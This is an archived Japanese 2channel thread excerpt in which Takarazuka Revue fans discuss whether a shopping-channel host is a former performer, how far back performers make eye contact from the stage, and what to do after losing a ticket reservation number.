319 :名無しさん@花束いっぱい。:2007/01/08(月) 00:14:03 ID:WFazsnfm
ツンデレktkr!www

320 :名無しさん@花束いっぱい。:2007/01/08(月) 21:30:30 ID:DgUeODEx
ショップチャンネルの
キャストの長谷川香子さんって元ジェンヌさんですよね?
いつ頃までいたか、何組でしたか?わかる方いませんか?

321 :名無しさん@花束いっぱい。:2007/01/08(月) 21:39:17 ID:lFElmoaV
白帆まり…かな?元花組の
エデンの東あたりで退団した気がする
震災の年?

322 :名無しさん@花束いっぱい。:2007/01/08(月) 21:44:25 ID:DgUeODEx
321さん
ありがとう。すっきりしました。
ショップチャンネル大好きでよく見てるので..
なかなか上手く商品説明されてますが声に張りがないので。

323 :名無しさん@花束いっぱい。:2007/01/09(火) 01:58:19 ID:sUnL1nyD
大劇場で目線は何列目位までもらえますか?

324 :名無しさん@花束いっぱい。:2007/01/09(火) 02:01:23 ID:YUP7dpXk
>323
その人による

325 :名無しさん@花束いっぱい。:2007/01/09(火) 08:12:24 ID:sUnL1nyD
>>324 ありがとうございました☆

326 :名無しさん@花束いっぱい。:2007/01/09(火) 23:26:53 ID:tQ/5h6Ex
11日に観に行くんですが一般予約した際の4ケタの番号をなくしてしまいました!!(>人<)予約していた席で見れるのでしょうか??どなたか教えてください…m(_ _ )m

327 :名無しさん@花束いっぱい。:2007/01/09(火) 23:46:26 ID:aE4xEDkF
>326
無理。

328 :名無しさん@花束いっぱい。:2007/01/10(水) 06:24:11 ID:6+5e1+k3
>326 予約したところに電話して事情を話してなんとかしてもらったら・・

329 :名無しさん@花束いっぱい。:2007/01/10(水) 10:07:44 ID:Pni2JoJw
ぴあだろ。予約番号なかったら無理だよ。
大事にとっとけとアナウンスされたはずの物をなくすのが悪い。

62 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)